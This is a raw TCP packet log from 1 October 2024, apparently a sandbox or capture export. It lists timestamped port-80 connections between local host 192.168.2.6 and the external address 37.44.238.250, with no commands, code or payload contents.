                                                          Oct 1, 2024 05:57:54.856756926 CEST804973337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.871825933 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.872523069 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.876976967 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.877043962 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.877399921 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.877463102 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.877588034 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.882366896 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.902616978 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.989316940 CEST804973337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.043240070 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.177248001 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.177936077 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.182365894 CEST804973337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.182475090 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.182746887 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.182812929 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.182926893 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.230986118 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.480750084 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.493230104 CEST804973337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.493421078 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.494029999 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.494043112 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.494246960 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.494354010 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.494365931 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.498275042 CEST804973337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.531740904 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.536612034 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.543239117 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.741503000 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.793260098 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.113842010 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.168247938 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.246516943 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.293231964 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.371745110 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.371830940 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.372453928 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.376859903 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.376912117 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.377177000 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.377218008 CEST804973637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.377226114 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.377274990 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.377403021 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.383665085 CEST804973637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.731025934 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.736202955 CEST804973637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.982575893 CEST804973637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.027709961 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.108823061 CEST804973637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.110002995 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.115272045 CEST804973637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.115336895 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.229127884 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.234083891 CEST804973737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.234164000 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.234302044 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.239144087 CEST804973737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.590303898 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.595324039 CEST804973737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.859369040 CEST804973737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.902755022 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.992934942 CEST804973737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:58.043239117 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.167331934 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.214831114 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.447096109 CEST804973837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:58.447232008 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.447370052 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.447798014 CEST804973737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:58.447947979 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.452105999 CEST804973837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:58.793350935 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.798511028 CEST804973837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.053325891 CEST804973837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.105839968 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.181299925 CEST804973837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.230722904 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.304416895 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.305092096 CEST4973980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.309638023 CEST804973837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.309705973 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.309978008 CEST804973937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.310051918 CEST4973980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.310153008 CEST4973980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.314894915 CEST804973937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.668317080 CEST4973980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.673325062 CEST804973937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.934602022 CEST804973937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.980731010 CEST4973980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.069160938 CEST804973937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:00.121382952 CEST4973980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.196357965 CEST4973980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.197057962 CEST4974080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.201647043 CEST804973937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:00.201745987 CEST4973980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.201865911 CEST804974037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:00.201931000 CEST4974080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.202050924 CEST4974080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.206770897 CEST804974037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:00.560297012 CEST4974080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.565293074 CEST804974037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:00.759129047 CEST4974180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.762917995 CEST4974080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.764240026 CEST804974137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:00.764344931 CEST4974180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.764462948 CEST4974180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.768079042 CEST804974037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:00.768146992 CEST4974080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.769237041 CEST804974137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:00.881443024 CEST4974280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.886398077 CEST804974237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:00.886490107 CEST4974280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.886586905 CEST4974280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:00.891362906 CEST804974237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:01.121498108 CEST4974180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.152592897 CEST4974180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.230814934 CEST4974280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.259615898 CEST804974137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:01.259665012 CEST804974137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:01.259696007 CEST804974137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:01.259723902 CEST804974237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:01.376286983 CEST804974137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:01.418235064 CEST4974180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.491219997 CEST804974237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:01.508830070 CEST804974137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:01.543246984 CEST4974280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.558851957 CEST4974180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.625001907 CEST804974237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:01.668267965 CEST4974280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.741931915 CEST4974180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.742002964 CEST4974280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.742691994 CEST4974380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.747117043 CEST804974137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:01.747180939 CEST4974180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.747422934 CEST804974237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:01.747471094 CEST4974280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.747540951 CEST804974337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:01.747612000 CEST4974380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.747724056 CEST4974380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:01.752469063 CEST804974337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:02.105789900 CEST4974380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:02.110774994 CEST804974337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:02.362976074 CEST804974337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:02.418366909 CEST4974380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:02.531914949 CEST804974337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:02.574482918 CEST4974380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:02.648426056 CEST4974480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:02.653434992 CEST804974437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:02.653527975 CEST4974480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:02.653613091 CEST4974480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:02.658415079 CEST804974437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:03.032437086 CEST4974480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:03.038012028 CEST804974437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:03.280139923 CEST804974437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:03.324532032 CEST4974480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:03.417182922 CEST804974437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:03.465114117 CEST4974480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:03.541805029 CEST4974380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:03.551148891 CEST4974480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:03.551820993 CEST4974580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:03.556611061 CEST804974537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:03.556674957 CEST4974580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:03.556848049 CEST4974580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:03.557511091 CEST804974437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:03.557552099 CEST4974480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:03.561614037 CEST804974537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:03.902724028 CEST4974580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:03.907650948 CEST804974537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:04.215714931 CEST804974537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:04.261991978 CEST4974580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:04.288882017 CEST804974537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:04.340092897 CEST4974580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:04.439256907 CEST4974580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:04.440200090 CEST4974680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:04.444724083 CEST804974537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:04.444770098 CEST4974580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:04.444946051 CEST804974637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:04.444998026 CEST4974680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:04.445091009 CEST4974680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:04.449800014 CEST804974637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:04.793356895 CEST4974680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:04.798464060 CEST804974637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:05.059312105 CEST804974637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:05.109177113 CEST4974680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:05.194909096 CEST804974637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:05.246362925 CEST4974680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:05.320677996 CEST4974680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:05.321309090 CEST4974780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:05.325973034 CEST804974637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:05.326076031 CEST4974680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:05.326122046 CEST804974737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:05.326205015 CEST4974780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:05.326306105 CEST4974780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:05.331095934 CEST804974737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:05.684154987 CEST4974780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:05.689249039 CEST804974737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:05.936384916 CEST804974737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:05.980875969 CEST4974780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.069905996 CEST804974737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:06.121387005 CEST4974780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.194133997 CEST4974780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.195365906 CEST4974880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.199577093 CEST804974737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:06.200371981 CEST804974837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:06.200534105 CEST4974780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.200567007 CEST4974880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.200678110 CEST4974880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.205585003 CEST804974837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:06.513179064 CEST4974980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.513267040 CEST4974880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.518203020 CEST804974937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:06.518733978 CEST4974980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.539853096 CEST4974980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.544734001 CEST804974937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:06.558437109 CEST804974837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:06.637101889 CEST804974837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:06.637211084 CEST4974880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.664069891 CEST4975080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.668999910 CEST804975037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:06.670677900 CEST4975080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.670768976 CEST4975080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.675611019 CEST804975037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:06.887140989 CEST4974980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:06.892113924 CEST804974937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:06.892288923 CEST804974937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:07.027745962 CEST4975080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:07.032676935 CEST804975037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:07.128727913 CEST804974937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:07.183963060 CEST4974980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:07.262018919 CEST804974937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:07.306022882 CEST804975037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:07.308875084 CEST4974980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:07.355751991 CEST4975080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:07.712416887 CEST804975037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:07.712651968 CEST804975037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:07.712727070 CEST4975080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:07.838233948 CEST4974980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:07.838294983 CEST4975080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:07.838871956 CEST4975180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:07.843599081 CEST804974937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:07.843656063 CEST4974980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:07.843765020 CEST804975137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:07.843884945 CEST4975180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:07.843995094 CEST4975180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:07.844047070 CEST804975037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:07.844089031 CEST4975080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:07.848881006 CEST804975137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:08.199726105 CEST4975180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:08.204755068 CEST804975137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:08.450721979 CEST804975137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:08.496840954 CEST4975180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:08.581130981 CEST804975137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:08.581432104 CEST4975180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:08.586690903 CEST804975137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:08.586782932 CEST4975180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:08.697076082 CEST4975280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:08.702006102 CEST804975237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:08.702078104 CEST4975280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:08.702168941 CEST4975280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:08.706937075 CEST804975237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:09.059089899 CEST4975280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:09.064162970 CEST804975237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:09.308294058 CEST804975237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:09.355742931 CEST4975280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:09.467139006 CEST804975237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:09.512034893 CEST4975280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:09.594707966 CEST4975280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:09.595401049 CEST4975380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:09.600001097 CEST804975237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:09.600233078 CEST804975337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:09.600292921 CEST4975280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:09.600323915 CEST4975380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:09.600423098 CEST4975380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:09.605214119 CEST804975337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:09.949620008 CEST4975380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:09.954674006 CEST804975337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:10.234700918 CEST804975337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:10.277626038 CEST4975380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:10.371033907 CEST804975337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:10.418292999 CEST4975380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:10.492075920 CEST4975380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:10.492669106 CEST4975480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:10.497415066 CEST804975337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:10.497442961 CEST804975437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:10.497474909 CEST4975380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:10.497524977 CEST4975480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:10.497617006 CEST4975480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:10.502330065 CEST804975437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:10.860961914 CEST4975480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:11.090171099 CEST4975480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:11.402621031 CEST4975480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:11.716557026 CEST804975437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:11.716583967 CEST804975437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:11.716593027 CEST804975437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:11.716646910 CEST4975480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:11.717211008 CEST804975437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:11.717236996 CEST4975480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:11.717395067 CEST804975437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:11.717459917 CEST804975437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:11.968523979 CEST804975437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.012001991 CEST4975480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.088193893 CEST4975480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.089061022 CEST4975580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.094192982 CEST804975437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.094239950 CEST4975480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.094954014 CEST804975537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.095010996 CEST4975580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.095127106 CEST4975580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.099831104 CEST804975537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.278203011 CEST4975580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.279309988 CEST4975680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.284131050 CEST804975637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.284188032 CEST4975680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.284267902 CEST4975680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.289010048 CEST804975637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.326396942 CEST804975537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.400727034 CEST4975780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.405591011 CEST804975737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.405649900 CEST4975780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.405754089 CEST4975780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.410438061 CEST804975737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.531393051 CEST804975537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.531445980 CEST4975580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.637193918 CEST4975680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.642195940 CEST804975637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.642355919 CEST804975637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.762170076 CEST4975780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:12.767309904 CEST804975737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.893801928 CEST804975637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:12.949505091 CEST4975680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:13.021226883 CEST804975637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:13.032345057 CEST804975737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:13.074506044 CEST4975780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:13.074517965 CEST4975680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:13.170599937 CEST804975737.44.238.250192.168.2.6
